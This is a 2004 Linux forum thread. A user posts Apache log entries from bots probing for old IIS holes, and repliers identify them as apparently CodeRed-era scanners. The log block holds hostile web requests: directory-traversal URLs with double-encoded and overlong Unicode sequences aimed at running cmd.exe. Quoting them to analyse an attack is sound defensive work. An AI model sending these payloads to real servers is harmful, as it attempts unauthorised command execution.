Find the answer to your Linux question:
Results 1 to 3 of 3
Well I'm starting to mess around with my apache logs a bit figuring out some stuff I can do with them and I keep coming accross little sections of the ...
Enjoy an ad free experience by logging in. Not a member yet? Register.
  1. 06-26-2004 #1
    Dillinger
    Dillinger is offline
    Linux User
    Join Date
    Jun 2003
    Location
    Huntington Beach, CA
    Posts
    390

    going through apache logs, found something wacky

    Well I'm starting to mess around with my apache logs a bit figuring out some stuff I can do with them and I keep coming accross little sections of the following throughout:
    Code:
    24.14.8.171 - - [07/Jan/2004:15:36:37 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 311 "-" "-"
24.14.8.171 - - [07/Jan/2004:15:36:37 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
24.14.8.171 - - [07/Jan/2004:15:36:38 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319 "-" "-"
24.14.8.171 - - [07/Jan/2004:15:36:38 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319 "-" "-"
24.14.8.171 - - [07/Jan/2004:15:36:38 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 "-" "-"
24.14.8.171 - - [07/Jan/2004:15:36:39 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 350 "-" "-"
24.14.8.171 - - [07/Jan/2004:15:36:39 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 350 "-" "-"
24.14.8.171 - - [07/Jan/2004:15:36:39 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 366 "-" "-
"
24.14.8.171 - - [07/Jan/2004:15:36:43 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 332 "-" "-"
24.14.8.171 - - [07/Jan/2004:15:36:43 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 332 "-" "-"
24.14.8.171 - - [07/Jan/2004:15:36:43 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 332 "-" "-"
24.14.8.171 - - [07/Jan/2004:15:36:44 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 332 "-" "-"
24.14.8.171 - - [07/Jan/2004:15:36:44 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 323 "-" "-"
24.14.8.171 - - [07/Jan/2004:15:36:44 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 323 "-" "-"
24.14.8.171 - - [07/Jan/2004:15:36:45 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 "-" "-"
24.14.8.171 - - [07/Jan/2004:15:36:45 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 "-" "-"
    I'm not sure what it is, looks like a hack attempt, but my guess is it's not good, any thoughts?
    Reply With Quote Reply With Quote
  2. 06-26-2004 #2
    Dolda2000
    Dolda2000 is offline
    Linux Guru
    Join Date
    Oct 2001
    Location
    Täby, Sweden
    Posts
    7,578
    It's just automated crackbots on the internet doing subnet scanning for IIS vulnarabilities (I'd guess those are the old CodeRed bots). The best thing you can do is report them to their ISPs, so that at least they're made aware that they are cracked.
    Reply With Quote Reply With Quote
  3. 06-26-2004 #3
    lakerdonald
    lakerdonald is offline
    Linux Guru lakerdonald's Avatar
    Join Date
    Jun 2004
    Location
    St. Petersburg, FL
    Posts
    5,035
    i'd say a stupid hacker who doesnt realize it's a linux box
    he's trying to get access to your box i'd say.
    yikes,
    -lakerdonald
    the lost art of found sound
    Reply With Quote Reply With Quote
« Previous Thread | Next Thread »

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

Forum Rules